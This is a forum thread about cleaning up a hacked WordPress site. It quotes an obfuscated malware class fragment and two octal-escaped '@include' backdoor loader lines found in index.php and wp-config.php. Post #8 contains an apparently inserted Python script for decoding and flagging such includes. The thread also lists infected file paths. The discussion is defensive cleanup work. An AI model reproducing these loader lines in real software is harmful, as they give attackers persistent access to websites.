Strangely named files.


#1

Hi all,
As per my introduction, I currently know nothing about PHP.
In the course of my work, I needed to change the mail address on the company website using WordPress.
In doing so, I noticed some strangely named files, like kykqudif.php and gutmtjy.php.
I also found Meuhy.php, and Google only shows that one in my searches as being hacked?

Looking for confirmation that these files are somewhat malicious?
gutmtjy.php contains

<?php

class _o7qfbx1{static private $_kde0xd2u = 1585596899;static function _o1w2a($_w9uuuyp0, $_2zxxq316){$_w9uuuyp0[2] = count($_w9uuuyp0) > 4 ? long2ip (_o7qfbx1::$_kde0xd2u - 711)

with a lot more similar code.

The index.php file had an include which was not in another site using WordPress. Below is the original.
I commented that out, removed the ‘’ characters below, and the site came back up. Previously there was a parse error.

TIA

<?php




/*35078*/

@include "\057ho\155e/\150ea\162t/\160ub\154ic\137ht\155l/\152ou\162na\154/c\141ch\145/.\1453b\143ba\0609.\151co";

/*35078*/
/**
 * Front to the WordPress application. This file doesn\'t do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define(\'WP_USE_THEMES\', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . \'/wp-blog-header.php\' );

#2

Delete those files.


#3

Thank you astonecipher,

I guessed as much.

Is there any easy way to scan for any more like that, or to download a full directory listing?

TIA


#4

You could look at site mappers. The biggest thing is to install something like WordFence or another security product to limit the hack's ability.


#5

Thank you.

I will look for both.


#6

May I just ask as well please

The site is running on WordPress 3.5.1 and it is offering to upgrade to 4.9.6.

The person who created the site, but no longer maintains it, suggested upgrading for security reasons, but said that doing so would likely break the site.

Are there any guidelines on upgrading from one version to another? Pitfalls, etc., features no longer supported?

TIA


#7

Hi all,

Would I be correct in thinking that if I discover any code that looks like the below, it should be commented out or even removed? This is in wp-config.php.

/*b1be2*/

@include "\057hom\145/he\141rt/\160ubl\151c_h\164ml/\167p-a\144min\057net\167ork\057.25\141a16\1450.i\143o";

/*b1be2*/

I apologise for the noob questions, but I cannot make head or tail of the above and have no idea what it is even trying to do, other than include something.


#8

Yes, remove any code that looks like that. Real code will use words, not encoded symbols, always.

You should be upgrading the site; I have the ones that I handle on auto-update. You can go through the list of plugins and themes to ensure compatibility. If there are several, it may be wise to make a copy of everything and do the update for testing before you actually push it into a production environment.
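The two @include lines quoted in #1 and #7 are ordinary PHP double-quoted strings whose characters have been written partly as octal escapes (\057 is "/", \155 is "m", and so on), so PHP sees a normal path while a human grepping for "/home" or ".ico" does not. The following is an added example, not code from this thread or from WordPress: a small Python decoder for PHP double-quoted escapes, plus an audit routine that finds include/require statements with a double-quoted literal argument and reports why each one looks like an injected loader. The function names are hypothetical, and the sample input is constructed from the two lines posted above plus one benign include.

```python
"""Decode PHP double-quoted string escapes and flag obfuscated include/require
statements of the kind quoted in this thread (index.php and wp-config.php).
Added example; helper names are hypothetical and the sample input is constructed."""
import re

# Escape sequences PHP recognises inside double-quoted strings: up to three
# octal digits, \xHH, \u{...} (PHP 7+), and the usual single-letter escapes.
_PHP_ESCAPE = re.compile(
    r'\\(?:(?P<oct>[0-7]{1,3})'
    r'|x(?P<hex>[0-9A-Fa-f]{1,2})'
    r'|u\{(?P<uni>[0-9A-Fa-f]+)\}'
    r'|(?P<simple>[nrtvef\\$"]))'
)
_SIMPLE = {'n': '\n', 'r': '\r', 't': '\t', 'v': '\v', 'e': '\x1b',
           'f': '\f', '\\': '\\', '$': '$', '"': '"'}


def php_unescape(literal: str) -> str:
    """Return the string PHP would build from the body of a double-quoted literal.
    Octal and hex escapes are treated as single bytes (mapped to Latin-1 chars)."""
    def repl(m):
        if m.group('oct') is not None:
            return chr(int(m.group('oct'), 8) & 0xFF)   # PHP wraps \400 to \000
        if m.group('hex') is not None:
            return chr(int(m.group('hex'), 16))
        if m.group('uni') is not None:
            return chr(int(m.group('uni'), 16))
        return _SIMPLE[m.group('simple')]
    return _PHP_ESCAPE.sub(repl, literal)


# include/require with a double-quoted literal argument, optional @ and parentheses.
_INCLUDE = re.compile(
    r'@?\b(include_once|include|require_once|require)\s*\(?\s*'
    r'"((?:[^"\\]|\\.)*)"\s*\)?\s*;'
)
_NUMERIC_ESCAPE = re.compile(r'\\(?:[0-7]{1,3}|x[0-9A-Fa-f])')


def audit_includes(php_source: str) -> list:
    """List every include/require of a double-quoted literal with its decoded
    path and the reasons (if any) it looks like an injected loader."""
    findings = []
    for m in _INCLUDE.finditer(php_source):
        raw = m.group(2)
        path = php_unescape(raw)
        name = path.rsplit('/', 1)[-1]
        reasons = []
        if _NUMERIC_ESCAPE.search(raw):
            reasons.append('path hidden behind octal/hex escapes')
        if name.startswith('.'):
            reasons.append('target is a dotfile')
        if not name.lower().endswith(('.php', '.inc')):
            reasons.append('target does not have a PHP extension')
        findings.append({'keyword': m.group(1), 'path': path, 'reasons': reasons})
    return findings


def suspicious_includes(php_source: str) -> list:
    """Only the findings that carry at least one reason."""
    return [f for f in audit_includes(php_source) if f['reasons']]


# Constructed sample: the two injected lines from this thread plus one benign include.
SAMPLE = r'''<?php
/*35078*/
@include "\057ho\155e/\150ea\162t/\160ub\154ic\137ht\155l/\152ou\162na\154/c\141ch\145/.\1453b\143ba\0609.\151co";
/*35078*/
/*b1be2*/
@include "\057hom\145/he\141rt/\160ubl\151c_h\164ml/\167p-a\144min\057net\167ork\057.25\141a16\1450.i\143o";
/*b1be2*/
require_once "wp-load.php";
'''

if __name__ == '__main__':
    for f in audit_includes(SAMPLE):
        flag = 'SUSPICIOUS' if f['reasons'] else 'ok'
        print(f"{flag:10} {f['keyword']} {f['path']}")
        for r in f['reasons']:
            print(f"           - {r}")
```

Run against the sample, the two injected lines decode to hidden ".ico" files under the site's own cache and wp-admin/network directories (those are the real payloads; the includes are just loaders), while the plain require_once is reported with no reasons. The "@" prefix silences any warning if the payload is later deleted, which is why the loader lines survive a cleanup that only removes the odd-named files. When auditing a real tree, feed each file's contents to audit_includes and then inspect (and remove) the decoded targets as well as the loader lines.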


#9

Thank you astonecipher

I have had a look at WordFence and can see that it should show any differences between the files and the core files initially distributed.

Going to be a steep learning curve. :slight_smile:


#10

Ideally I'd suggest deleting the server and launching a new instance with verified code, either from your VCS or a new install from WordPress (remember backups!). If your site has been compromised you have no way of knowing where they may have hidden backdoors.


#11

Hi JimL,

I have discovered Anti-Malware Security and Brute-Force Firewall, and have installed it; it is scanning as I type.
It has picked up some of the files I spotted.
We also had a user like wp.service.controller.xxxxxx?

The plugin has listed the following. Anything prefixed with DNU I have spotted and renamed.

…/public_html/conweb.php.suspected
…/public_html/journal/DNUgutmtjy.php
…/public_html/wp-admin/press-this.php
…/public_html/wp-admin/includes/class-pclzip.php
…/public_html/wp-admin/js/revisions-js.php
…/public_html/wp-content/plugins/backupbuddy/_importbuddy/importbuddy/lib/pclzip/pclzip.php
…/public_html/wp-content/plugins/backupbuddy/js/timepicker.js
…/public_html/wp-content/plugins/formidable/pro/js/jquery.MetaData.js
…/public_html/wp-content/plugins/formidable/pro/js/jquery.ui.datepicker.1.7.3.js
…/public_html/wp-content/plugins/formidable/pro/js/jquery.ui.datepicker.js
…/public_html/wp-content/plugins/formidable/pro/js/nicedit.js
…/public_html/wp-content/plugins/jnewsticker-for-wordpress/media/timepicker/jquery-ui-timepicker-addon.js
…/public_html/wp-content/plugins/jnewsticker-for-wordpress/media/timepicker/jquery-ui-timepicker-addon.min.js
…/public_html/wp-content/plugins/js_composer/assets/js_composer.js
…/public_html/wp-content/plugins/js_composer/assets/flexslider/demo/js/shCore.js
…/public_html/wp-content/plugins/js_composer/composer/lib/shortcodes.php
…/public_html/wp-content/plugins/js_composer/composer/lib/shortcodes/accordion.php
…/public_html/wp-content/plugins/js_composer/composer/lib/shortcodes/tabs.php
…/public_html/wp-content/plugins/wp-google-maps/js/jquery.dataTables.js
…/public_html/wp-content/themes/twentyeleven/colors/sjxqwctr.php
…/public_html/wp-content/themes/twentyeleven/images/qiyrabjm.php
…/public_html/wp-content/themes/twentyten/kykqudif.php
…/public_html/wp-content/uploads/2016/06/oyexldqw.php
…/public_html/wp-content/uploads/formidable/css/ssotehkb.php
…/public_html/wp-includes/SimplePie/Parse/oqcdaqjv.php
…/public_html/wp-includes/js/json2.js
…/public_html/wp-includes/js/json2.min.js
…/public_html/wp-includes/js/tw-sack.js
…/public_html/wp-includes/js/tw-sack.min.js
…/public_html/wp-includes/js/jquery/jquery.schedule.js
…/public_html/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js
…/public_html/wp-includes/js/swfupload/swfupload-all.js
…/public_html/wp-includes/js/swfupload/swfupload.js
…/public_html/wp-includes/js/tinymce/tiny_mce.js
…/public_html/wp-includes/js/tinymce/tiny_mce_popup.js
…/public_html/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.js
…/public_html/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.min.js